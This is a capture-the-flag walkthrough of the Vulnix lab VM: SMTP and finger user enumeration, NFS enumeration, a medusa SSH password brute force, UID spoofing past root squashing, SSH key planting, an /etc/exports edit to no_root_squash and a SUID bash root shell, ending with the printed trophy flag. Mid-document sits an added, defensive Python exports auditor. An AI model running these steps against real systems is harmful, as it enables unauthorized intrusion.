
VM 5: Vulnix

Walkthru:

A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating a Linux user with a specific UID, root squashing, SSH password cracking using medusa & hydra, logging in using SSH keys, updating /usr/sbin/exportfs]

B. http://overflowsecurity.com/hacklab-vulnix/ [same as above; creates SSH keys for root and copies them to the victim to log in as root without recovering the password]

C. https://www.rebootuser.com/?p=988 [local bash shell from NFS]

D. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions]

E. https://www.rebootuser.com/?p=988 [User Enumeration #1: SMTP, Finger; Entry Point including hydra, PuTTY (using the rlogin service), NFS (showmount, mount)]



Notes:

- As you can see, the root user is the only account logged on to the remote host. Now that we have a specific username, we can use it to obtain more information about this user with the command finger root@host.

Another effective use of the finger command is with the syntax finger user@host.
We have the following users:
root, user, dovenull

- VRFY username over SMTP to double-check the usernames

1. Scan shows many ports
2. telnet to port 25 smtp



# telnet 192.168.56.103 25
Trying 192.168.56.103...
Connected to 192.168.56.103.
Escape character is '^]'.
220 vulnix ESMTP Postfix (Ubuntu)
ehlo server
250-vulnix
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
vrfy root [will respond as below if the user exists]
252 2.0.0 root
vrfy admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table
vrfy user
252 2.0.0 user
vrfy administrator
550 5.1.1 <administrator>: Recipient address rejected: User unknown in local recipient table
vrfy vulnix
252 2.0.0 vulnix

3. I find 3 users on the system: root, user and vulnix. I go ahead with some research using finger:



# finger @192.168.56.103
No one logged on.
# finger root@192.168.56.103
Login: root                 Name: root
Directory: /root                      Shell: /bin/bash
Never logged in.
No mail.
No Plan.

# finger user@192.168.56.103
Login: user                 Name: user
Directory: /home/user                 Shell: /bin/bash
Never logged in.
No mail.
No Plan.

Login: dovenull             Name: Dovecot login user
Directory: /nonexistent               Shell: /bin/false
Never logged in.
No mail.
No Plan.

# finger vulnix@192.168.56.103
Login: vulnix               Name: 
Directory: /home/vulnix               Shell: /bin/bash
Never logged in.
No mail.
No Plan.

4. Interestingly, the user user also has a virtual user for Dovecot, but with no login. Dovecot is an open source email server. This could be useful information to bear in mind.
5. The service rpcbind is open. This is useful to do some RPC enumeration:



# rpcinfo -p 192.168.56.103
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    3   tcp    111  portmapper
    100000    2   tcp    111  portmapper
    100000    4   udp    111  portmapper
    100000    3   udp    111  portmapper
    100000    2   udp    111  portmapper
    100024    1   udp  55327  status
    100024    1   tcp  46272  status
    100003    2   tcp   2049  nfs
    100003    3   tcp   2049  nfs
    100003    4   tcp   2049  nfs
    100227    2   tcp   2049
    100227    3   tcp   2049
    100003    2   udp   2049  nfs
    100003    3   udp   2049  nfs
    100003    4   udp   2049  nfs
    100227    2   udp   2049
    100227    3   udp   2049
    100021    1   udp  53621  nlockmgr
    100021    3   udp  53621  nlockmgr
    100021    4   udp  53621  nlockmgr
    100021    1   tcp  49130  nlockmgr
    100021    3   tcp  49130  nlockmgr
    100021    4   tcp  49130  nlockmgr
    100005    1   udp  60970  mountd
    100005    1   tcp  35565  mountd
    100005    2   udp  58037  mountd
    100005    2   tcp  34661  mountd
    100005    3   udp  37005  mountd
    100005    3   tcp  33461  mountd

6. Now I know for sure that the NFS is listening on port 2049/tcp and 2049/udp. At this point it’s time to do some NFS enumeration:



# showmount -e 192.168.56.103
Export list for 192.168.56.103:
/home/vulnix *

7. This means that a share is accessible from any host. So I mount the location of this share on my local machine:



# mount 192.168.56.103:/home/vulnix /mnt/vulnix/

but when I try to access the folder, I get an access denied error. I try to change the permissions to gain access, but I get the same error. I think root squashing is the cause.
What is root squash?
Root squash basically remaps the root UID from 0 to an anonymous user with no privileges (usually nobody:nogroup). This means that root is stripped of all privileges and is not able to read any files which are not world-readable, or write to any paths that are restricted.


[source: http://fullyautolinux.blogspot.com/2015/11/nfs-norootsquash-and-suid-basic-nfs.html]


8. At this point, I decide to bruteforce the passwords of the users that I’ve retrieved. I create a file collecting all the users (without the user dovenull, who doesn’t have a login access):



# cat users.txt

root
user
vulnix

and I use the wordlist rockyou.txt to crack the password:



# medusa -h 192.168.56.103 -U users.txt -P /usr/share/wordlists/rockyou.txt -e ns -f -M ssh > medusa_output.txt




9. I finally crack the password of the user user, which is letmein.

10. Of course, this user is not a sudoer. Last resort is trying to log in as user vulnix.
11. I check the /etc/passwd file on the victim server and find out that the user vulnix has UID 2008, so I create a user called vulnix on my local machine with UID 2008 and try to access the partition again:
11a. kali# useradd -u 2008 vulnix
11b. # su - vulnix
11c. cd /mnt/vulnix/
11d. ls -la
total 20
drwxr-x--- 2 4294967294 4294967294 4096 Sep  2  2012 .
drwxr-xr-x 3 root       root       4096 Feb  6 17:48 ..
-rw-r--r-- 1 4294967294 4294967294  220 Apr  3  2012 .bash_logout
-rw-r--r-- 1 4294967294 4294967294 3486 Apr  3  2012 .bashrc
-rw-r--r-- 1 4294967294 4294967294  675 Apr  3  2012 .profile

12. I’m in, so I generate an SSH key to log in on the server as user vulnix without password:



This is on my local machine as myself, generating a new SSH key:
# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):      
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
c0:62:1d:58:df:9e:ab:2d:cb:97:ac:65:5c:bf:3e:cf root@karen
The key's randomart image is:
+---[RSA 2048]----+
|     oo          |
|    .o o .       |
|    o + . .      |
|   . . . . .     |
|        S o .    |
|         . o .   |
|         .=.  .  |
|       ..=+   .o |
|        ==.  .ooE|
+-----------------+

# cat /root/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RaeMdpTMXa+biV7pwsvAhzlf4XhMjO9Ia6JM0zAgHN8JsW1FXVtxX90xBJ2CKrYu5aj7PYAlZDxoAMYYLF402pkwKU89j9U38malcuTWRNbj6NNI3BeWRDcxdHsKu8b42xIFGKmBIitZRRCl4uKXDV/WIejdK9vWRTNaYZ9W33vwXEhjyYH/HvBhNpmYYMiqzahhRNqd1Ir6qtaVdQPE63Bu3EY9mfTg5XtnPQzoHlnCkDLFwBVrSPXHnnjnAoSNoAc25ff0A6gveqnRAz8lWqOPJ5cruHzXE3ZOQXfTcH71h0a1uBEoMw9GPkuJM7ba6OwZALVEfO15LkliBZ0t root@karen

and on another terminal as `vulnix` user, copying the generated ssh-key into the `/home/vulnix/.ssh/authorized_keys` file:
vulnix@karen:/mnt/vulnix$ mkdir .ssh
vulnix@karen:/mnt/vulnix$ cd .ssh  
vulnix@karen:/mnt/vulnix/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC1RaeMdpTMXa+biV7pwsvAhzlf4XhMjO9Ia6JM0zAgHN8JsW1FXVtxX90xBJ2CKrYu5aj7PYAlZDxoAMYYLF402pkwKU89j9U38malcuTWRNbj6NNI3BeWRDcxdHsKu8b42xIFGKmBIitZRRCl4uKXDV/WIejdK9vWRTNaYZ9W33vwXEhjyYH/HvBhNpmYYMiqzahhRNqd1Ir6qtaVdQPE63Bu3EY9mfTg5XtnPQzoHlnCkDLFwBVrSPXHnnjnAoSNoAc25ff0A6gveqnRAz8lWqOPJ5cruHzXE3ZOQXfTcH71h0a1uBEoMw9GPkuJM7ba6OwZALVEfO15LkliBZ0t root@karen" > authorized_keys
vulnix@karen:/mnt/vulnix/.ssh$ 
vulnix@karen:/mnt/vulnix/.ssh$ ls -l
total 4
-rw-r--r-- 1 4294967294 4294967294 392 Feb  6 19:17 authorized_keys


and then I login on the victim's machine as `vulnix`:
# ssh vulnix@192.168.56.103  [had problems while connecting, as I was getting a password prompt instead of passing through. I used -vvv with the ssh command from the Kali server to debug, cleaned the known_hosts and id_rsa files from root's folders, which I thought was the problem, generated the keys again, copied them and tried again, and it went through without prompting for a password]

Welcome to Ubuntu 12.04.1 LTS (GNU/Linux 3.2.0-29-generic-pae i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Feb  6 19:21:13 GMT 2016

  System load:  0.0              Processes:           88
  Usage of /:   90.2% of 773MB   Users logged in:     0
  Memory usage: 8%               IP address for eth0: 192.168.56.103
  Swap usage:   0%

  => / is using 90.2% of 773MB

  Graph this data and manage this system at https://landscape.canonical.com/

13. vulnix@vulnix:~$ whoami
vulnix
vulnix@vulnix:~$ id
uid=2008(vulnix) gid=2008(vulnix) groups=2008(vulnix) 

I don't know vulnix's password, but I find out that it is a sudoer:
$ sudo -l
Matching 'Defaults' entries for vulnix on this host:
    env_reset, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User vulnix may run the following commands on this host:
    (root) sudoedit /etc/exports, (root) NOPASSWD: sudoedit /etc/exports

This is good, since vulnix can run a command to open /etc/exports even without typing a password. This is what I find:


$ sudoedit /etc/exports

# /etc/exports: the access control list for filesystems which may be exported
#               to NFS clients.  See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4        gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes  gss/krb5i(rw,sync,no_subtree_check)
#
/home/vulnix    *(rw,root_squash)
/root    *(rw,no_root_squash)

Remember what I said about root squashing before? (thanks for the lesson, Owen xD)
I replace the root_squash flag with no_root_squash. I need to cheat a bit, since I don't have vulnix's password and there's no way to re-export the NFS partition without a sudo user executing the command /usr/sbin/exportfs -a or a machine reboot, so I reboot it manually [here I was getting some errors when I tried to mount the same folder as root, so I added /root to the export list so I could map that instead]
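Turning the root-squash discussion and the export list above into a check a defender can run: an added example, not code from the original post or from any of the linked walkthroughs, that parses exports(5) lines and flags the three conditions this walkthrough chained together (wildcard client, read-write, no_root_squash). The sample exports are constructed from the lines shown above plus one hostname-restricted entry; hostname1 and hostname2 are placeholders.

```python
# Added example (not from the original post): audit exports(5) lines for wildcard clients, rw exports and missing root squashing.
import re

# Constructed sample: the two live exports from the post plus one hostname-restricted line.
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/home/vulnix    *(rw,root_squash)
/root    *(rw,no_root_squash)
/srv/homes       hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
"""
CLIENT_RE = re.compile(r"^([^(]*)(?:\((.*)\))?$")  # host(opt,opt) or bare host

def parse_exports(text):
    """Return (path, host, [options]) tuples, one per client entry."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        fields = line.split()
        path, clients = fields[0], fields[1:] or ["*"]  # no client spec = everyone, per exports(5)
        for client in clients:
            match = CLIENT_RE.match(client)
            if match:  # skip malformed entries such as an unbalanced parenthesis
                host, opts = match.groups()
                options = [o for o in (opts or "").split(",") if o]
                entries.append((path, host or "*", options))
    return entries

def root_squashed(options):
    """NFS squashes root by default; a later option overrides an earlier one."""
    squashed = True
    for opt in options:
        if opt == "no_root_squash":
            squashed = False
        elif opt in ("root_squash", "all_squash"):
            squashed = True
    return squashed

def audit_exports(text):
    """Return {path: [issue, ...]} for every export with at least one issue."""
    findings = {}
    for path, host, options in parse_exports(text):
        issues = ["any host may mount (wildcard client)"] if host == "*" else []
        if "rw" in options:
            issues.append("exported read-write")
        if not root_squashed(options):
            issues.append("no_root_squash: client root is server root")
        if issues:
            findings.setdefault(path, []).extend(f"{host}: {i}" for i in issues)
    return findings
```

Run against the file shown above it reports /root with all three issues and /home/vulnix with two; the UID-matching trick from step 11 is why a wildcard read-write export is still flagged when root_squash is on.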
14. Once the machine has rebooted, I mount the partition again and access it as the local root user. At this point I can cat the trophy.txt file.
15. Additional steps, which I didn't have to use. Once mounted, I get a copy of the victim machine's local shell and change its ownership and SUID bit to root:


On the victim's machine, as `vulnix`:
$ cp /bin/bash local_shell

On my local machine, as `root`:
# ls -l
total 900
-rwxr-xr-x 1 4294967294 4294967294 920788 Feb  6 20:53 local_shell
root@karen:/mnt/vulnix# cat local_shell > spawn_root_shell
root@karen:/mnt/vulnix# chmod 4777 !$
chmod 4777 spawn_root_shell

On the victim's machine I then execute the shell keeping the original file's permissions with the flag `-p`:

$ ls -l
total 1800
-rwxr-xr-x 1 vulnix vulnix 920788 Feb  6 20:53 local_shell
-rwsrwxrwx 1 root   root   920788 Feb  6 20:54 spawn_root_shell
$ ./spawn_root_shell -p
spawn_root_shell-4.2# whoami
root
spawn_root_shell-4.2# cd /root/
spawn_root_shell-4.2# ls -l
total 4
-r-------- 1 root root 33 Sep  2  2012 trophy.txt
spawn_root_shell-4.2# cat trophy.txt 
cc614640424f5bd60ce5d5264899c3be
